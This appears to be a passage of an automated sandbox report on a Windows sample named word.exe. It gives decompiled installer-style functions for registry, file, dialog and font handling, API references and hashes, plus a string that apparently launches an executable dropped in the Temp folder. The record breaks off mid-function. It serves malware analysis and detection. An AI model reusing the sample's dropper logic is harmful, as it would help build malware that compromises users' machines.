                                                          • Instruction ID: 51fa150e18871bc54a8ab07165f54a8d5d4e89d78de25ff2bd43d0f4b5788034
                                                          • Opcode Fuzzy Hash: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
                                                          • Instruction Fuzzy Hash: E6F0D171B04100ABC721AFB59D4EEA93BA8DB45318B600936F800F61D2E5BC89519668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E00402AC5(void* _a4, char* _a8, intOrPtr _a12) {
                                                          				void* _v8;
                                                          				char _v272;
                                                          				long _t18;
                                                          				intOrPtr* _t27;
                                                          				long _t28;
                                                          
                                                          				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423fd0 | 0x00000008,  &_v8);
                                                          				if(_t18 == 0) {
                                                          					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                          						if(_a12 != 0) {
                                                          							RegCloseKey(_v8);
                                                          							L8:
                                                          							return 1;
                                                          						}
                                                          						if(E00402AC5(_v8,  &_v272, 0) != 0) {
                                                          							break;
                                                          						}
                                                          					}
                                                          					RegCloseKey(_v8);
                                                          					_t27 = E00405DDA(2);
                                                          					if(_t27 == 0) {
                                                          						if( *0x423fd0 != 0) {
                                                          							goto L8;
                                                          						}
                                                          						_t28 = RegDeleteKeyA(_a4, _a8);
                                                          						if(_t28 != 0) {
                                                          							goto L8;
                                                          						}
                                                          						return _t28;
                                                          					}
                                                          					return  *_t27(_a4, _a8,  *0x423fd0, 0);
                                                          				}
                                                          				return _t18;
                                                          			}









                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402AE6
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B22
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B2B
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B50
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B6E
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
                                                          • Instruction ID: a2f84c9fc7c0001da7a9db1dd1493ef20417761c41d84b505e0dd7cc978203d5
                                                          • Opcode Fuzzy Hash: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
                                                          • Instruction Fuzzy Hash: 17116D31A00009FEDF21AF90DE48EAF3B7DEB44344B104036FA05B50A0D3B4AE52AB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00401D0E(int __edx) {
                                                          				void* _t17;
                                                          				struct HINSTANCE__* _t21;
                                                          				struct HWND__* _t25;
                                                          				void* _t27;
                                                          
                                                          				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                          				GetClientRect(_t25, _t27 - 0x48);
                                                          				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A85(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x1c),  *(_t27 - 0x3c) *  *(_t27 - 0x1c), 0x10));
                                                          				if(_t17 != _t21) {
                                                          					DeleteObject(_t17);
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t27 - 4));
                                                          				return 0;
                                                          			}








                                                          APIs
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
                                                          • Instruction ID: 353d02df9da9ec42832837f4cb5a1f013013b856dd18917493dbd5b1045c63a4
                                                          • Opcode Fuzzy Hash: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
                                                          • Instruction Fuzzy Hash: 25F0F9B2E04104BFD700DFA4EE88DAFB7BCEB44311B005476F602F21A1C6789E428B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 35%
                                                          			E0040468C(int _a4, intOrPtr _a8, unsigned int _a12) {
                                                          				char _v36;
                                                          				char _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t26;
                                                          				void* _t34;
                                                          				signed int _t36;
                                                          				signed int _t39;
                                                          				unsigned int _t46;
                                                          
                                                          				_t46 = _a12;
                                                          				_push(0x14);
                                                          				_pop(0);
                                                          				_t34 = 0xffffffdc;
                                                          				if(_t46 < 0x100000) {
                                                          					_push(0xa);
                                                          					_pop(0);
                                                          					_t34 = 0xffffffdd;
                                                          				}
                                                          				if(_t46 < 0x400) {
                                                          					_t34 = 0xffffffde;
                                                          				}
                                                          				if(_t46 < 0xffff3333) {
                                                          					_t39 = 0x14;
                                                          					asm("cdq");
                                                          					_t46 = _t46 + 1 / _t39;
                                                          				}
                                                          				_push(E00405B16(_t34, 0, _t46,  &_v36, 0xffffffdf));
                                                          				_push(E00405B16(_t34, 0, _t46,  &_v68, _t34));
                                                          				_t21 = _t46 & 0x00ffffff;
                                                          				_t36 = 0xa;
                                                          				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
                                                          				_push(_t46 >> 0);
                                                          				_t26 = E00405B16(_t34, 0, 0x420530, 0x420530, _a8);
                                                          				wsprintfA(_t26 + lstrlenA(0x420530), "%u.%u%s%s");
                                                          				return SetDlgItemTextA( *0x4236f8, _a4, 0x420530);
                                                          			}














                                                          APIs
                                                          • lstrlenA.KERNEL32(00420530,00420530,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AC,000000DF,?,00000000,00000400), ref: 0040471A
                                                          • wsprintfA.USER32 ref: 00404722
                                                          • SetDlgItemTextA.USER32(?,00420530), ref: 00404735
                                                          Strings
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                                                          • Instruction ID: fc2b73f6c965b4b8d77eae39fc1b1cea645aa0e87c551c7386791207db77a036
                                                          • Opcode Fuzzy Hash: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                                                          • Instruction Fuzzy Hash: B7110473B001243BDB106A699C06EAF369DCBC2374F14063BFA25F61D1E979AC5186EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 54%
                                                          			E00401BF8(void* __ecx) {
                                                          				signed int _t30;
                                                          				CHAR* _t33;
                                                          				long _t34;
                                                          				int _t39;
                                                          				signed int _t40;
                                                          				int _t44;
                                                          				void* _t46;
                                                          				int _t51;
                                                          				struct HWND__* _t55;
                                                          				void* _t58;
                                                          
                                                          				_t46 = __ecx;
                                                          				 *(_t58 - 8) = E00402A85(0x33);
                                                          				 *(_t58 + 8) = E00402A85(0x44);
                                                          				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
                                                          					 *((intOrPtr*)(__ebp - 8)) = E00405A6B(__ecx,  *((intOrPtr*)(__ebp - 8)));
                                                          				}
                                                          				__eflags =  *(_t58 - 0x10) & 0x00000002;
                                                          				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
                                                          					 *(_t58 + 8) = E00405A6B(_t46,  *(_t58 + 8));
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
                                                          				_push(1);
                                                          				if(__eflags != 0) {
                                                          					_t53 = E00402A85();
                                                          					_t30 = E00402A85();
                                                          					asm("sbb ecx, ecx");
                                                          					asm("sbb eax, eax");
                                                          					_t33 =  ~( *_t29) & _t53;
                                                          					__eflags = _t33;
                                                          					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
                                                          					goto L10;
                                                          				} else {
                                                          					_t55 = E00402A68();
                                                          					_t39 = E00402A68();
                                                          					_t51 =  *(_t58 - 0x10) >> 2;
                                                          					if(__eflags == 0) {
                                                          						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
                                                          						L10:
                                                          						 *(_t58 - 0x3c) = _t34;
                                                          					} else {
                                                          						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x3c);
                                                          						asm("sbb eax, eax");
                                                          						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
                                                          					}
                                                          				}
                                                          				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
                                                          				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
                                                          					_push( *(_t58 - 0x3c));
                                                          					E00405A52();
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t58 - 4));
                                                          				return 0;
                                                          			}














                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C5A
                                                          • SendMessageA.USER32 ref: 00401C72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E004059DB(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
                                                          				long _t20;
                                                          				char* _t26;
                                                          
                                                          				asm("sbb eax, eax");
                                                          				_t26 = _a16;
                                                          				 *_t26 = 0;
                                                          				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                          				if(_t20 == 0) {
                                                          					_a8 = 0x400;
                                                          					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
                                                          						 *_t26 = 0;
                                                          					}
                                                          					_t26[0x3ff] = 0;
                                                          					return RegCloseKey(_a20);
                                                          				}
                                                          				return _t20;
                                                          			}






                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(0041FD08,00000006,00000000,-00004250,-00004250), ref: 00405A04
                                                          • RegQueryValueExA.ADVAPI32 ref: 00405A25
                                                          • RegCloseKey.ADVAPI32(-00004250), ref: 00405A46
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw, xrefs: 004059DE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                          • API String ID: 3677997916-1675380478
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004055E7(CHAR* _a4) {
                                                          				CHAR* _t7;
                                                          
                                                          				_t7 = _a4;
                                                          				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                          					lstrcatA(_t7, 0x409010);
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 004055ED
                                                          • CharPrevA.USER32(?,00000000), ref: 004055F6
                                                          • lstrcatA.KERNEL32(?,00409010), ref: 00405607
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004055E7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4017390910
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00402366(void* __eax, void* __eflags) {
                                                          				void* _t15;
                                                          				char* _t18;
                                                          				int _t19;
                                                          				char _t24;
                                                          				int _t27;
                                                          				intOrPtr _t32;
                                                          				void* _t37;
                                                          
                                                          				_t15 = E00402B7A(__eax);
                                                          				_t32 =  *((intOrPtr*)(_t37 - 0x14));
                                                          				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                                          				 *(_t37 - 0x34) = E00402A85(2);
                                                          				_t18 = E00402A85(0x11);
                                                          				_t31 =  *0x423fd0 | 0x00000002;
                                                          				 *(_t37 - 4) = 1;
                                                          				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423fd0 | 0x00000002, _t27, _t37 + 8, _t27);
                                                          				if(_t19 == 0) {
                                                          					if(_t32 == 1) {
                                                          						E00402A85(0x23);
                                                          						_t19 = lstrlenA(0x409bf8) + 1;
                                                          					}
                                                          					if(_t32 == 4) {
                                                          						_t24 = E00402A68(3);
                                                          						 *0x409bf8 = _t24;
                                                          						_t19 = _t32;
                                                          					}
                                                          					if(_t32 == 3) {
                                                          						_t19 = E00402F71(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x409bf8, 0xc00);
                                                          					}
                                                          					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t27,  *(_t37 - 0x30), 0x409bf8, _t19) == 0) {
                                                          						 *(_t37 - 4) = _t27;
                                                          					}
                                                          					_push( *(_t37 + 8));
                                                          					RegCloseKey();
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 004023A4
                                                          • lstrlenA.KERNEL32(00409BF8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C4
                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,00409BF8,00000000), ref: 004023FD
                                                          • RegCloseKey.ADVAPI32(?), ref: 004024E0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateValuelstrlen
                                                          • String ID:
                                                          • API String ID: 1356686001-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E004021C8(void* __eflags) {
                                                          				void* __ebx;
                                                          				char _t34;
                                                          				CHAR* _t36;
                                                          				CHAR* _t38;
                                                          				void* _t41;
                                                          
                                                          				_t38 = E00402A85(_t34);
                                                          				 *(_t41 + 8) = _t38;
                                                          				_t36 = E00402A85(0x11);
                                                          				if(E00405D9C(_t38) != 0) {
                                                          					 *(_t41 - 0x54) =  *(_t41 - 8);
                                                          					 *((intOrPtr*)(_t41 - 0x50)) = 2;
                                                          					( &(_t38[1]))[lstrlenA(_t38)] = _t34;
                                                          					( &(_t36[1]))[lstrlenA(_t36)] = _t34;
                                                          					E00405B16(_t34, _t36, 0x409bf8, 0x409bf8, 0xfffffff8);
                                                          					lstrcatA(0x409bf8, _t36);
                                                          					 *(_t41 - 0x4c) =  *(_t41 + 8);
                                                          					 *(_t41 - 0x48) = _t36;
                                                          					 *(_t41 - 0x3a) = 0x409bf8;
                                                          					 *((short*)(_t41 - 0x44)) =  *((intOrPtr*)(_t41 - 0x1c));
                                                          					E00404E9F(_t34, 0x409bf8);
                                                          					if(SHFileOperationA(_t41 - 0x54) != 0) {
                                                          						goto L1;
                                                          					}
                                                          				} else {
                                                          					L1:
                                                          					E00404E9F(0xfffffff9, _t34);
                                                          					 *((intOrPtr*)(_t41 - 4)) = 1;
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t41 - 4));
                                                          				return 0;
                                                          			}









                                                          APIs
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00008001,00000000,C:\,?,0040570B,C:\,C:\,00000000,C:\,C:\,?,C:\Users\user\AppData\Roaming\word.exe,755513E0,0040543A,?,755513E0), ref: 00405DAA
                                                            • Part of subcall function 00405D9C: FindFirstFileA.KERNELBASE(?,00422580), ref: 00405DB6
                                                            • Part of subcall function 00405D9C: SetErrorMode.KERNELBASE(00000000), ref: 00405DC0
                                                            • Part of subcall function 00405D9C: FindClose.KERNELBASE(00000000), ref: 00405DC8
                                                          • lstrlenA.KERNEL32 ref: 00402201
                                                          • lstrlenA.KERNEL32(00000000), ref: 0040220B
                                                          • lstrcatA.KERNEL32(00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402223
                                                          • SHFileOperationA.SHELL32(?,?,00409BF8,00409BF8,00000000,00409BF8,000000F8,00000000), ref: 00402247
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileFindModelstrlen$CloseFirstOperationlstrcat
                                                          • String ID:
                                                          • API String ID: 2246384517-0
                                                          • Opcode ID: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                                                          • Instruction ID: a3fb08b87a3da4a4acbea606a4f252bd6f521f47b87daa54263f745b893ff540
                                                          • Opcode Fuzzy Hash: a004e70d55816916d6918ca924290d61a23b4e1e6597895eda44e8916ffc4c11
                                                          • Instruction Fuzzy Hash: 36119171E04215AACB10EFEA8D4498EB7B8AF45314F10813BF510F72D2DABC99418BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E00401F20(char __ebx, char* __edi, char* __esi) {
                                                          				char* _t18;
                                                          				int _t19;
                                                          				void* _t30;
                                                          
                                                          				_t18 = E00402A85(0xffffffee);
                                                          				 *(_t30 - 0x2c) = _t18;
                                                          				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
                                                          				 *__esi = __ebx;
                                                          				 *(_t30 - 0x3c) = _t19;
                                                          				 *__edi = __ebx;
                                                          				 *((intOrPtr*)(_t30 - 4)) = 1;
                                                          				if(_t19 != __ebx) {
                                                          					__eax = GlobalAlloc(0x40, __eax);
                                                          					 *(__ebp + 8) = __eax;
                                                          					if(__eax != __ebx) {
                                                          						if(__eax != 0) {
                                                          							__ebp - 0x34 = __ebp - 8;
                                                          							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 8, __ebp - 0x34) != 0) {
                                                          								 *(__ebp - 8) = E00405A52(__esi,  *((intOrPtr*)( *(__ebp - 8) + 8)));
                                                          								 *(__ebp - 8) = E00405A52(__edi,  *((intOrPtr*)( *(__ebp - 8) + 0xc)));
                                                          								 *((intOrPtr*)(__ebp - 4)) = __ebx;
                                                          							}
                                                          						}
                                                          						_push( *(__ebp + 8));
                                                          						GlobalFree();
                                                          					}
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t30 - 4));
                                                          				return 0;
                                                          			}







                                                          APIs
                                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F2F
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F4D
                                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F66
                                                          • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F7F
                                                            • Part of subcall function 00405A52: wsprintfA.USER32 ref: 00405A5F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                                                          • Instruction ID: 664519773470a51a07128ab34de84be56150192837950b593d79a90dcc03585f
                                                          • Opcode Fuzzy Hash: b638af819fa124869f4f0744651443bd380a3e7449b22e631ddc4b1f11902375
                                                          • Instruction Fuzzy Hash: 3F115EB1A00108BFDB01AFA5DD81EEEBBB8EF44344F10803AF505F21A1D7789A54DB28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 61%
                                                          			E00401D68() {
                                                          				void* __esi;
                                                          				int _t6;
                                                          				signed char _t11;
                                                          				struct HFONT__* _t14;
                                                          				void* _t18;
                                                          				void* _t24;
                                                          				void* _t26;
                                                          				void* _t28;
                                                          
                                                          				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                          				0x4093bc->lfHeight =  ~(MulDiv(E00402A68(2), _t6, 0x48));
                                                          				 *0x4093cc = E00402A68(3);
                                                          				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                          				 *0x4093d3 = 1;
                                                          				 *0x4093d0 = _t11 & 0x00000001;
                                                          				 *0x4093d1 = _t11 & 0x00000002;
                                                          				 *0x4093d2 = _t11 & 0x00000004;
                                                          				E00405B16(_t18, _t24, _t26, 0x4093d8,  *((intOrPtr*)(_t28 - 0x20)));
                                                          				_t14 = CreateFontIndirectA(0x4093bc);
                                                          				_push(_t14);
                                                          				_push(_t26);
                                                          				E00405A52();
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t28 - 4));
                                                          				return 0;
                                                          			}












                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirect
                                                          • String ID:
                                                          • API String ID: 3272661963-0
                                                          • Opcode ID: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                                                          • Instruction ID: ab44fcfaedae078b8a2075b08ba9bdacc1048924ee142b10c901050df09d38a1
                                                          • Opcode Fuzzy Hash: 39ab024a4e29bd2e00a8025c4fb31945af92016a005f7318998ecfc7e748a056
                                                          • Instruction Fuzzy Hash: C8F04471949240AFEB015BB0AE1AB9A3B689719705F145479F641B61E3C6BC19048F2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E00403955(void* __ecx, void* __eflags) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed short _t6;
                                                          				intOrPtr _t11;
                                                          				signed int _t13;
                                                          				signed int _t16;
                                                          				signed short* _t18;
                                                          				signed int _t20;
                                                          				signed short* _t23;
                                                          				intOrPtr _t25;
                                                          				signed int _t26;
                                                          				intOrPtr* _t27;
                                                          
                                                          				_t24 = "1033";
                                                          				_t13 = 0xffff;
                                                          				_t6 = E00405A6B(__ecx, "1033");
                                                          				while(1) {
                                                          					_t26 =  *0x423f64;
                                                          					if(_t26 == 0) {
                                                          						goto L7;
                                                          					}
                                                          					_t16 =  *( *0x423f28 + 0x64);
                                                          					_t20 =  ~_t16;
                                                          					_t18 = _t16 * _t26 +  *0x423f60;
                                                          					while(1) {
                                                          						_t18 = _t18 + _t20;
                                                          						_t26 = _t26 - 1;
                                                          						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                          							break;
                                                          						}
                                                          						if(_t26 != 0) {
                                                          							continue;
                                                          						}
                                                          						goto L7;
                                                          					}
                                                          					 *0x423700 = _t18[1];
                                                          					 *0x423fc8 = _t18[3];
                                                          					_t23 =  &(_t18[5]);
                                                          					if(_t23 != 0) {
                                                          						 *0x4236fc = _t23;
                                                          						E00405A52(_t24,  *_t18 & 0x0000ffff);
                                                          						SetWindowTextA( *0x420508, E00405B16(_t13, _t24, _t26, 0x423720, 0xfffffffe));
                                                          						_t11 =  *0x423f4c;
                                                          						_t27 =  *0x423f48;
                                                          						if(_t11 == 0) {
                                                          							L15:
                                                          							return _t11;
                                                          						}
                                                          						_t25 = _t11;
                                                          						do {
                                                          							_t11 =  *_t27;
                                                          							if(_t11 != 0) {
                                                          								_t11 = E00405B16(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                          							}
                                                          							_t27 = _t27 + 0x418;
                                                          							_t25 = _t25 - 1;
                                                          						} while (_t25 != 0);
                                                          						goto L15;
                                                          					}
                                                          					L7:
                                                          					if(_t13 != 0xffff) {
                                                          						_t13 = 0;
                                                          					} else {
                                                          						_t13 = 0x3ff;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • SetWindowTextA.USER32(00000000,00423720), ref: 004039ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: TextWindow
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 530164218-1176120985
                                                          • Opcode ID: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                                                          • Instruction ID: 8a4911383cf402a951a33a18ad4b30e04e91385bd266f89a5cbd6e28b98f55da
                                                          • Opcode Fuzzy Hash: 8e92532aa80ad6ebe9a5af3ec32b3f4998cc8b457f85ca1392f46d3598825830
                                                          • Instruction Fuzzy Hash: A511C2B1B006119BC720DF15EC809377BBCEB88716769813BD901A73D1D73D9E028A58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00404DEF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                          				long _t22;
                                                          
                                                          				if(_a8 != 0x102) {
                                                          					if(_a8 != 0x200) {
                                                          						_t22 = _a16;
                                                          						L7:
